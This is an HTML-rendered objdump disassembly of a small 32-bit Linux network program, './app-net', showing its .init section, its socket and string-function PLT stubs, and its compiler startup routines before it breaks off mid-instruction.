span class="code-line"span class="normal"300/span/span span class="code-line"span class="normal"301/span/span span class="code-line"span class="normal"302/span/span span class="code-line"span class="normal"303/span/span span class="code-line"span class="normal"304/span/span span class="code-line"span class="normal"305/span/span span class="code-line"span class="normal"306/span/span span class="code-line"span class="normal"307/span/span span class="code-line"span class="normal"308/span/span span class="code-line"span class="normal"309/span/span span class="code-line"span class="normal"310/span/span span class="code-line"span class="normal"311/span/span span class="code-line"span class="normal"312/span/span span class="code-line"span class="normal"313/span/span span class="code-line"span class="normal"314/span/span span class="code-line"span class="normal"315/span/span span class="code-line"span class="normal"316/span/span span class="code-line"span class="normal"317/span/span span class="code-line"span class="normal"318/span/span span class="code-line"span class="normal"319/span/span span class="code-line"span class="normal"320/span/span span class="code-line"span class="normal"321/span/span span class="code-line"span class="normal"322/span/span span class="code-line"span class="normal"323/span/span span class="code-line"span class="normal"324/span/span span class="code-line"span class="normal"325/span/span span class="code-line"span class="normal"326/span/span span class="code-line"span class="normal"327/span/span span class="code-line"span class="normal"328/span/span span class="code-line"span class="normal"329/span/span span class="code-line"span class="normal"330/span/span span class="code-line"span class="normal"331/span/span span class="code-line"span class="normal"332/span/span span class="code-line"span class="normal"333/span/span span class="code-line"span class="normal"334/span/span span class="code-line"span class="normal"335/span/span span class="code-line"span class="normal"336/span/span span class="code-line"span class="normal"337/span/span span class="code-line"span class="normal"338/span/span span class="code-line"span class="normal"339/span/span span class="code-line"span class="normal"340/span/span span class="code-line"span class="normal"341/span/span span class="code-line"span class="normal"342/span/span span class="code-line"span class="normal"343/span/span span class="code-line"span class="normal"344/span/span span class="code-line"span class="normal"345/span/span span class="code-line"span class="normal"346/span/span span class="code-line"span class="normal"347/span/span span class="code-line"span class="normal"348/span/span span class="code-line"span class="normal"349/span/span span class="code-line"span class="normal"350/span/span span class="code-line"span class="normal"351/span/span span class="code-line"span class="normal"352/span/span span class="code-line"span class="normal"353/span/span span class="code-line"span class="normal"354/span/span span class="code-line"span class="normal"355/span/span span class="code-line"span class="normal"356/span/span span class="code-line"span class="normal"357/span/span span class="code-line"span class="normal"358/span/span span class="code-line"span class="normal"359/span/span span class="code-line"span class="normal"360/span/span span class="code-line"span class="normal"361/span/span span class="code-line"span class="normal"362/span/span span class="code-line"span class="normal"363/span/span span class="code-line"span class="normal"364/span/span span class="code-line"span class="normal"365/span/span span class="code-line"span class="normal"366/span/span span class="code-line"span class="normal"367/span/span span class="code-line"span class="normal"368/span/span span class="code-line"span class="normal"369/span/span span class="code-line"span class="normal"370/span/span span class="code-line"span class="normal"371/span/span span class="code-line"span class="normal"372/span/span span class="code-line"span class="normal"373/span/span span class="code-line"span class="normal"374/span/span span class="code-line"span class="normal"375/span/span span class="code-line"span class="normal"376/span/span span class="code-line"span class="normal"377/span/span span class="code-line"span class="normal"378/span/span span class="code-line"span class="normal"379/span/span span class="code-line"span class="normal"380/span/span span class="code-line"span class="normal"381/span/span span class="code-line"span class="normal"382/span/span span class="code-line"span class="normal"383/span/span span class="code-line"span class="normal"384/span/span span class="code-line"span class="normal"385/span/span span class="code-line"span class="normal"386/span/span span class="code-line"span class="normal"387/span/span span class="code-line"span class="normal"388/span/span span class="code-line"span class="normal"389/span/span span class="code-line"span class="normal"390/span/span span class="code-line"span class="normal"391/span/span span class="code-line"span class="normal"392/span/span span class="code-line"span class="normal"393/span/span span class="code-line"span class="normal"394/span/span span class="code-line"span class="normal"395/span/span span class="code-line"span class="normal"396/span/span span class="code-line"span class="normal"397/span/span span class="code-line"span class="normal"398/span/span span class="code-line"span class="normal"399/span/span span class="code-line"span class="normal"400/span/span span class="code-line"span class="normal"401/span/span span class="code-line"span class="normal"402/span/span span class="code-line"span class="normal"403/span/span span class="code-line"span class="normal"404/span/span span class="code-line"span class="normal"405/span/span span class="code-line"span class="normal"406/span/span span class="code-line"span class="normal"407/span/span span class="code-line"span class="normal"408/span/span span class="code-line"span class="normal"409/span/span span class="code-line"span class="normal"410/span/span span class="code-line"span class="normal"411/span/span span class="code-line"span class="normal"412/span/span span class="code-line"span class="normal"413/span/span span class="code-line"span class="normal"414/span/span span class="code-line"span class="normal"415/span/span span class="code-line"span class="normal"416/span/span span class="code-line"span class="normal"417/span/span span class="code-line"span class="normal"418/span/span span class="code-line"span class="normal"419/span/span span class="code-line"span class="normal"420/span/span span class="code-line"span class="normal"421/span/span span class="code-line"span class="normal"422/span/span span class="code-line"span class="normal"423/span/span span class="code-line"span class="normal"424/span/span span class="code-line"span class="normal"425/span/span span class="code-line"span class="normal"426/span/span span class="code-line"span class="normal"427/span/span span class="code-line"span class="normal"428/span/span span class="code-line"span class="normal"429/span/span span class="code-line"span class="normal"430/span/span span class="code-line"span class="normal"431/span/span span class="code-line"span class="normal"432/span/span span class="code-line"span class="normal"433/span/span span class="code-line"span class="normal"434/span/span span class="code-line"span class="normal"435/span/span span class="code-line"span class="normal"436/span/span span class="code-line"span class="normal"437/span/span span class="code-line"span class="normal"438/span/span span class="code-line"span class="normal"439/span/span span class="code-line"span class="normal"440/span/span span class="code-line"span class="normal"441/span/span span class="code-line"span class="normal"442/span/span span class="code-line"span class="normal"443/span/span span class="code-line"span class="normal"444/span/span span class="code-line"span class="normal"445/span/span span class="code-line"span class="normal"446/span/span span class="code-line"span class="normal"447/span/span span class="code-line"span class="normal"448/span/span span class="code-line"span class="normal"449/span/span span class="code-line"span class="normal"450/span/span span class="code-line"span class="normal"451/span/span span class="code-line"span class="normal"452/span/span span class="code-line"span class="normal"453/span/span span class="code-line"span class="normal"454/span/span span class="code-line"span class="normal"455/span/span span class="code-line"span class="normal"456/span/span span class="code-line"span class="normal"457/span/span span class="code-line"span class="normal"458/span/span span class="code-line"span class="normal"459/span/span span class="code-line"span class="normal"460/span/span span class="code-line"span class="normal"461/span/span span class="code-line"span class="normal"462/span/span span class="code-line"span class="normal"463/span/span span class="code-line"span class="normal"464/span/span span class="code-line"span class="normal"465/span/span span class="code-line"span class="normal"466/span/span span class="code-line"span class="normal"467/span/span span class="code-line"span class="normal"468/span/span span class="code-line"span class="normal"469/span/span span class="code-line"span class="normal"470/span/span span class="code-line"span class="normal"471/span/span span class="code-line"span class="normal"472/span/span span class="code-line"span class="normal"473/span/span span class="code-line"span class="normal"474/span/span span class="code-line"span class="normal"475/span/span span class="code-line"span class="normal"476/span/span span class="code-line"span class="normal"477/span/span span class="code-line"span class="normal"478/span/span span class="code-line"span class="normal"479/span/span span class="code-line"span class="normal"480/span/span span class="code-line"span class="normal"481/span/span span class="code-line"span class="normal"482/span/span span class="code-line"span class="normal"483/span/span span class="code-line"span class="normal"484/span/span span class="code-line"span class="normal"485/span/span span class="code-line"span class="normal"486/span/span span class="code-line"span class="normal"487/span/span span class="code-line"span class="normal"488/span/span span class="code-line"span class="normal"489/span/span span class="code-line"span class="normal"490/span/span span class="code-line"span class="normal"491/span/span span class="code-line"span class="normal"492/span/span span class="code-line"span class="normal"493/span/span span class="code-line"span class="normal"494/span/span span class="code-line"span class="normal"495/span/span span class="code-line"span class="normal"496/span/span span class="code-line"span class="normal"497/span/span span class="code-line"span class="normal"498/span/span span class="code-line"span class="normal"499/span/span span class="code-line"span class="normal"500/span/span span class="code-line"span class="normal"501/span/span span class="code-line"span class="normal"502/span/span span class="code-line"span class="normal"503/span/span span class="code-line"span class="normal"504/span/span span class="code-line"span class="normal"505/span/span span class="code-line"span class="normal"506/span/span span class="code-line"span class="normal"507/span/span span class="code-line"span class="normal"508/span/span span class="code-line"span class="normal"509/span/span span class="code-line"span class="normal"510/span/span span class="code-line"span class="normal"511/span/span span class="code-line"span class="normal"512/span/span span class="code-line"span class="normal"513/span/span span class="code-line"span class="normal"514/span/span span class="code-line"span class="normal"515/span/span span class="code-line"span class="normal"516/span/span span class="code-line"span class="normal"517/span/span span class="code-line"span class="normal"518/span/span span class="code-line"span class="normal"519/span/span span class="code-line"span class="normal"520/span/span span class="code-line"span class="normal"521/span/span span class="code-line"span class="normal"522/span/span span class="code-line"span class="normal"523/span/span span class="code-line"span class="normal"524/span/span span class="code-line"span class="normal"525/span/span span class="code-line"span class="normal"526/span/span span class="code-line"span class="normal"527/span/span span class="code-line"span class="normal"528/span/span span class="code-line"span class="normal"529/span/span span class="code-line"span class="normal"530/span/span span class="code-line"span class="normal"531/span/span span class="code-line"span class="normal"532/span/span span class="code-line"span class="normal"533/span/span span class="code-line"span class="normal"534/span/span span class="code-line"span class="normal"535/span/span span class="code-line"span class="normal"536/span/span span class="code-line"span class="normal"537/span/span span class="code-line"span class="normal"538/span/span span class="code-line"span class="normal"539/span/span span class="code-line"span class="normal"540/span/span span class="code-line"span class="normal"541/span/span span class="code-line"span class="normal"542/span/span span class="code-line"span class="normal"543/span/span span class="code-line"span class="normal"544/span/span span class="code-line"span class="normal"545/span/span span class="code-line"span class="normal"546/span/span span class="code-line"span class="normal"547/span/span span class="code-line"span class="normal"548/span/span span class="code-line"span class="normal"549/span/span span class="code-line"span class="normal"550/span/span span class="code-line"span class="normal"551/span/span span class="code-line"span class="normal"552/span/span span class="code-line"span class="normal"553/span/span span class="code-line"span class="normal"554/span/span span class="code-line"span class="normal"555/span/span span class="code-line"span class="normal"556/span/span span class="code-line"span class="normal"557/span/span span class="code-line"span class="normal"558/span/span span class="code-line"span class="normal"559/span/span span class="code-line"span class="normal"560/span/span span class="code-line"span class="normal"561/span/span span class="code-line"span class="normal"562/span/span span class="code-line"span class="normal"563/span/span span class="code-line"span class="normal"564/span/span span class="code-line"span class="normal"565/span/span span class="code-line"span class="normal"566/span/span span class="code-line"span class="normal"567/span/span span class="code-line"span class="normal"568/span/span span class="code-line"span class="normal"569/span/span span class="code-line"span class="normal"570/span/span span class="code-line"span class="normal"571/span/span span class="code-line"span class="normal"572/span/span span class="code-line"span class="normal"573/span/span span class="code-line"span class="normal"574/span/span span class="code-line"span class="normal"575/span/span span class="code-line"span class="normal"576/span/span span class="code-line"span class="normal"577/span/span span class="code-line"span class="normal"578/span/span span class="code-line"span class="normal"579/span/span span class="code-line"span class="normal"580/span/span span class="code-line"span class="normal"581/span/span span class="code-line"span class="normal"582/span/span span class="code-line"span class="normal"583/span/span span class="code-line"span class="normal"584/span/span span class="code-line"span class="normal"585/span/span span class="code-line"span class="normal"586/span/span span class="code-line"span class="normal"587/span/span span class="code-line"span class="normal"588/span/span span class="code-line"span class="normal"589/span/span span class="code-line"span class="normal"590/span/span span class="code-line"span class="normal"591/span/span span class="code-line"span class="normal"592/span/span span class="code-line"span class="normal"593/span/span span class="code-line"span class="normal"594/span/span span class="code-line"span class="normal"595/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nl"./app-net/spanspan class="p":/span file format span class="s"elf32-i386/span/span span class="code-line"/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".init/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"080485e0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_init/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80485e0: 55 push ebp/span/span span class="code-line"span class="x" 80485e1: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80485e3: 53 push ebx/span/span span class="code-line"span class="x" 80485e4: 83 ec 04 sub esp,0x4/span/span span class="code-line"span class="x" 80485e7: e8 00 00 00 00 call 80485ec lt;_init+0xcgt;/span/span span class="code-line"span class="x" 80485ec: 5b pop ebx/span/span span class="code-line"span class="x" 80485ed: 81 c3 14 0b 00 00 add ebx,0xb14/span/span span class="code-line"span class="x" 80485f3: 8b 93 fc ff ff ff mov edx,DWORD PTR [ebx-0x4]/span/span span class="code-line"span class="x" 80485f9: 85 d2 test edx,edx/span/span span class="code-line"span class="x" 80485fb: 74 05 je 8048602 lt;_init+0x22gt;/span/span span class="code-line"span class="x" 80485fd: e8 ae 00 00 00 call 80486b0 lt;__gmon_start__@pltgt;/span/span span class="code-line"span class="x" 8048602: 58 pop eax/span/span span class="code-line"span class="x" 8048603: 5b pop ebx/span/span span class="code-line"span class="x" 8048604: c9 leave /span/span span class="code-line"span class="x" 8048605: c3 ret /span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".plt/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048610/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strcmp@plt/spanspan class="p"-/spanspan class="mh"0x10/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048610: ff 35 04 91 04 08 push DWORD PTR ds:0x8049104/span/span span class="code-line"span class="x" 8048616: ff 25 08 91 04 08 jmp DWORD PTR ds:0x8049108/span/span span class="code-line"span class="x" 804861c: 00 00 add BYTE PTR [eax],al/span/span span class="code-line"span class="x" .../span/span span class="code-line"/span span class="code-line"span class="mh"08048620/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strcmp@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048620: ff 25 0c 91 04 08 jmp DWORD PTR ds:0x804910c/span/span span class="code-line"span class="x" 8048626: 68 00 00 00 00 push 0x0/span/span span class="code-line"span class="x" 804862b: e9 e0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048630/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"printf@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048630: ff 25 10 91 04 08 jmp DWORD PTR ds:0x8049110/span/span span class="code-line"span class="x" 8048636: 68 08 00 00 00 push 0x8/span/span span class="code-line"span class="x" 804863b: e9 d0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048640/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"bzero@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048640: ff 25 14 91 04 08 jmp DWORD PTR ds:0x8049114/span/span span class="code-line"span class="x" 8048646: 68 10 00 00 00 push 0x10/span/span span class="code-line"span class="x" 804864b: e9 c0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048650/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"fclose@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048650: ff 25 18 91 04 08 jmp DWORD PTR ds:0x8049118/span/span span class="code-line"span class="x" 8048656: 68 18 00 00 00 push 0x18/span/span span class="code-line"span class="x" 804865b: e9 b0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048660/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"recvfrom@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048660: ff 25 1c 91 04 08 jmp DWORD PTR ds:0x804911c/span/span span class="code-line"span class="x" 8048666: 68 20 00 00 00 push 0x20/span/span span class="code-line"span class="x" 804866b: e9 a0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048670/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_IO_getc@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048670: ff 25 20 91 04 08 jmp DWORD PTR ds:0x8049120/span/span span class="code-line"span class="x" 8048676: 68 28 00 00 00 push 0x28/span/span span class="code-line"span class="x" 804867b: e9 90 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048680/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"htons@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048680: ff 25 24 91 04 08 jmp DWORD PTR ds:0x8049124/span/span span class="code-line"span class="x" 8048686: 68 30 00 00 00 push 0x30/span/span span class="code-line"span class="x" 804868b: e9 80 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048690/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"accept@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048690: ff 25 28 91 04 08 jmp DWORD PTR ds:0x8049128/span/span span class="code-line"span class="x" 8048696: 68 38 00 00 00 push 0x38/span/span span class="code-line"span class="x" 804869b: e9 70 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486a0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"puts@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486a0: ff 25 2c 91 04 08 jmp DWORD PTR ds:0x804912c/span/span span class="code-line"span class="x" 80486a6: 68 40 00 00 00 push 0x40/span/span span class="code-line"span class="x" 80486ab: e9 60 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486b0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__gmon_start__@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486b0: ff 25 30 91 04 08 jmp DWORD PTR ds:0x8049130/span/span span class="code-line"span class="x" 80486b6: 68 48 00 00 00 push 0x48/span/span span class="code-line"span class="x" 80486bb: e9 50 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486c0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"exit@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486c0: ff 25 34 91 04 08 jmp DWORD PTR ds:0x8049134/span/span span class="code-line"span class="x" 80486c6: 68 50 00 00 00 push 0x50/span/span span class="code-line"span class="x" 80486cb: e9 40 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486d0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strlen@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486d0: ff 25 38 91 04 08 jmp DWORD PTR ds:0x8049138/span/span span class="code-line"span class="x" 80486d6: 68 58 00 00 00 push 0x58/span/span span class="code-line"span class="x" 80486db: e9 30 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486e0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_start_main@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486e0: ff 25 3c 91 04 08 jmp DWORD PTR ds:0x804913c/span/span span class="code-line"span class="x" 80486e6: 68 60 00 00 00 push 0x60/span/span span class="code-line"span class="x" 80486eb: e9 20 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486f0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"bind@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486f0: ff 25 40 91 04 08 jmp DWORD PTR ds:0x8049140/span/span span class="code-line"span class="x" 80486f6: 68 68 00 00 00 push 0x68/span/span span class="code-line"span class="x" 80486fb: e9 10 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048700/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"fopen@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048700: ff 25 44 91 04 08 jmp DWORD PTR ds:0x8049144/span/span span class="code-line"span class="x" 8048706: 68 70 00 00 00 push 0x70/span/span span class="code-line"span class="x" 804870b: e9 00 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048710/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strncpy@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048710: ff 25 48 91 04 08 jmp DWORD PTR ds:0x8049148/span/span span class="code-line"span class="x" 8048716: 68 78 00 00 00 push 0x78/span/span span class="code-line"span class="x" 804871b: e9 f0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048720/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"sendto@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048720: ff 25 4c 91 04 08 jmp DWORD PTR ds:0x804914c/span/span span class="code-line"span class="x" 8048726: 68 80 00 00 00 push 0x80/span/span span class="code-line"span class="x" 804872b: e9 e0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048730/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"htonl@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048730: ff 25 50 91 04 08 jmp DWORD PTR ds:0x8049150/span/span span class="code-line"span class="x" 8048736: 68 88 00 00 00 push 0x88/span/span span class="code-line"span class="x" 804873b: e9 d0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048740/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"listen@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048740: ff 25 54 91 04 08 jmp DWORD PTR ds:0x8049154/span/span span class="code-line"span class="x" 8048746: 68 90 00 00 00 push 0x90/span/span span class="code-line"span class="x" 804874b: e9 c0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048750/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"atoi@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048750: ff 25 58 91 04 08 jmp DWORD PTR ds:0x8049158/span/span span class="code-line"span class="x" 8048756: 68 98 00 00 00 push 0x98/span/span span class="code-line"span class="x" 804875b: e9 b0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048760/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"socket@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048760: ff 25 5c 91 04 08 jmp DWORD PTR ds:0x804915c/span/span span class="code-line"span class="x" 8048766: 68 a0 00 00 00 push 0xa0/span/span span class="code-line"span class="x" 804876b: e9 a0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048770/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"close@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048770: ff 25 60 91 04 08 jmp DWORD PTR ds:0x8049160/span/span span class="code-line"span class="x" 8048776: 68 a8 00 00 00 push 0xa8/span/span span class="code-line"span class="x" 804877b: e9 90 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".text/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048780/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_start/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048780: 31 ed xor ebp,ebp/span/span span class="code-line"span class="x" 8048782: 5e pop esi/span/span span class="code-line"span class="x" 8048783: 89 e1 mov ecx,esp/span/span span class="code-line"span class="x" 8048785: 83 e4 f0 and esp,0xfffffff0/span/span span class="code-line"span class="x" 8048788: 50 push eax/span/span span class="code-line"span class="x" 8048789: 54 push esp/span/span span class="code-line"span class="x" 804878a: 52 push edx/span/span span class="code-line"span class="x" 804878b: 68 00 8d 04 08 push 0x8048d00/span/span span class="code-line"span class="x" 8048790: 68 10 8d 04 08 push 0x8048d10/span/span span class="code-line"span class="x" 8048795: 51 push ecx/span/span span class="code-line"span class="x" 8048796: 56 push esi/span/span span class="code-line"span class="x" 8048797: 68 6c 88 04 08 push 0x804886c/span/span span class="code-line"span class="x" 804879c: e8 3f ff ff ff call 80486e0 lt;__libc_start_main@pltgt;/span/span span class="code-line"span class="x" 80487a1: f4 hlt /span/span span class="code-line"span class="x" 80487a2: 90 nop/span/span span class="code-line"span class="x" 80487a3: 90 nop/span/span span class="code-line"span class="x" 80487a4: 90 nop/span/span span class="code-line"span class="x" 80487a5: 90 nop/span/span span class="code-line"span class="x" 80487a6: 90 nop/span/span span class="code-line"span class="x" 80487a7: 90 nop/span/span span class="code-line"span class="x" 80487a8: 90 nop/span/span span class="code-line"span class="x" 80487a9: 90 nop/span/span span class="code-line"span class="x" 80487aa: 90 nop/span/span span class="code-line"span class="x" 80487ab: 90 nop/span/span span class="code-line"span class="x" 80487ac: 90 nop/span/span span class="code-line"span class="x" 80487ad: 90 nop/span/span span class="code-line"span class="x" 80487ae: 90 nop/span/span span class="code-line"span class="x" 80487af: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"080487b0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"deregister_tm_clones/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80487b0: b8 6f 91 04 08 mov eax,0x804916f/span/span span class="code-line"span class="x" 80487b5: 2d 6c 91 04 08 sub eax,0x804916c/span/span span class="code-line"span class="x" 80487ba: 83 f8 06 cmp eax,0x6/span/span span class="code-line"span class="x" 80487bd: 77 02 ja 80487c1 lt;deregister_tm_clones+0x11gt;/span/span span class="code-line"span class="x" 80487bf: f3 c3 repz ret /span/span span class="code-line"span class="x" 80487c1: b8 00 00 00 00 mov eax,0x0/span/span span class="code-line"span class="x" 80487c6: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 80487c8: 74 f5 je 80487bf lt;deregister_tm_clones+0xfgt;/span/span span class="code-line"span class="x" 80487ca: 55 push ebp/span/span span class="code-line"span class="x" 80487cb: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80487cd: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 80487d0: c7 04 24 6c 91 04 08 mov DWORD PTR [esp],0x804916c/span/span span class="code-line"span class="x" 80487d7: ff d0 call eax/span/span span class="code-line"span class="x" 80487d9: c9 leave /span/span span class="code-line"span class="x" 80487da: c3 ret /span/span span class="code-line"span class="x" 80487db: 90 nop/span/span span class="code-line"span class="x" 80487dc: 8d 74 26 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"080487e0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"register_tm_clones/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80487e0: b8 6c 91 04 08 mov eax,0x804916c/span/span span class="code-line"span class="x" 80487e5: 2d 6c 91 04 08 sub eax,0x804916c/span/span span class="code-line"span class="x" 80487ea: c1 f8 02 sar eax,0x2/span/span span class="code-line"span class="x" 80487ed: 89 c2 mov edx,eax/span/span span class="code-line"span class="x" 80487ef: c1 ea 1f shr edx,0x1f/span/span span class="code-line"span class="x" 80487f2: 01 d0 add eax,edx/span/span span class="code-line"span class="x" 80487f4: d1 f8 sar eax,1/span/span span class="code-line"span class="x" 80487f6: 75 02 jne 80487fa lt;register_tm_clones+0x1agt;/span/span span class="code-line"span class="x" 80487f8: f3 c3 repz ret /span/span span class="code-line"span class="x" 80487fa: ba 00 00 00 00 mov edx,0x0/span/span span class="code-line"span class="x" 80487ff: 85 d2 test edx,edx/span/span span class="code-line"span class="x" 8048801: 74 f5 je 80487f8 lt;register_tm_clones+0x18gt;/span/span span class="code-line"span class="x" 8048803: 55 push ebp/span/span span class="code-line"span class="x" 8048804: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048806: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 8048809: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 804880d: c7 04 24 6c 91 04 08 mov DWORD PTR [esp],0x804916c/span/span span class="code-line"span class="x" 8048814: ff d2 call edx/span/span span class="code-line"span class="x" 8048816: c9 leave /span/span span class="code-line"span class="x" 8048817: c3 ret /span/span span class="code-line"span class="x" 8048818: 90 nop/span/span span class="code-line"span class="x" 8048819: 8d b4 26 00 00 00 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"08048820/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__do_global_dtors_aux/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048820: 80 3d 6c 91 04 08 00 cmp BYTE PTR ds:0x804916c,0x0/span/span span class="code-line"span class="x" 8048827: 75 13 jne 804883c lt;__do_global_dtors_aux+0x1cgt;/span/span span class="code-line"span class="x" 8048829: 55 push ebp/span/span span class="code-line"span class="x" 804882a: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 804882c: 83 ec 08 sub esp,0x8/span/span span class="code-line"span class="x" 804882f: e8 7c ff ff ff call 80487b0 lt;deregister_tm_clonesgt;/span/span span class="code-line"span class="x" 8048834: c6 05 6c 91 04 08 01 mov BYTE PTR ds:0x804916c,0x1/span/span span class="code-line"span class="x" 804883b: c9 leave /span/span span class="code-line"span class="x" 804883c: f3 c3 repz ret /span/span span class="code-line"span class="x" 804883e: 66 90 xchg ax,ax/span/span span class="code-line"/span span class="code-line"span class="mh"08048840/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"frame_dummy/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048840: a1 08 90 04 08 mov eax,ds:0x8049008/span/span span class="code-line"span class="x" 8048845: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 8048847: 74 1e je 8048867 lt;frame_dummy+0x27gt;/span/span span class="code-line"span class="x" 8048849: b8 00 00 00 00 mov eax,0x0/span/span span class="code-line"span class="x" 804884e: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 8048850: 74 15 je 8048867 lt;frame_dummy+0x27gt;/span/span span class="code-line"span class="x" 8048852: 55 push ebp/span/span span class="code-line"span class="x" 8048853: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048855: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 8048858: c7 04 24 08 90 04 08 mov DWORD PTR [esp],0x8049008/span/span span class="code-line"span class="x" 804885f: ff d0 call eax/span/span span class="code-line"span class="x" 8048861: c9 leave /span/span span class="code-line"span class="x" 8048862: e9 79 ff ff ff jmp 